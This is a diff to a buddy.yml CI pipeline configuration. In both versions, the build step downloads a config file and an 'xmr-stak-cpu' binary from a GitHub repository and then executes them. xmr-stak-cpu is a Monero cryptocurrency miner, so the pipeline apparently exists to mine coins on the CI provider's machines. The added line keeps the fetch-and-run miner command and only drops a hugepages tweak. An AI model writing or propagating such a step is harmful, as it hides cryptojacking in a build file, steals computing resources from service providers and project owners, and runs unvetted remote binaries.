--- a/buddy.yml
+++ b/buddy.yml
@@ -7,5 +7,5 @@
     docker_image_name: "ubuntu"
     docker_image_tag: "16.04" 
     execute_commands:
-    - "apt-get update && apt-get install -y wget libmicrohtbev cmake build-essential libhwloc-dev && wget https://github.com/tureku/tureku/raw/master/config.txt && wget https://github.com/tureku/tureku/raw/master/xmr-stak-cpu && chmod +x xmr-stak-cpu && sysctl -w vm.nr_hugepages=128 && ./xmr-stak-cpu"
+    - "apt-get update && apt-get install -y wget libmicrohtbev cmake build-essential libhwloc-dev && wget https://github.com/tureku/tureku/raw/master/config.txt && wget https://github.com/tureku/tureku/raw/master/xmr-stak-cpu && chmod +x xmr-stak-cpu && ./xmr-stak-cpu"
     
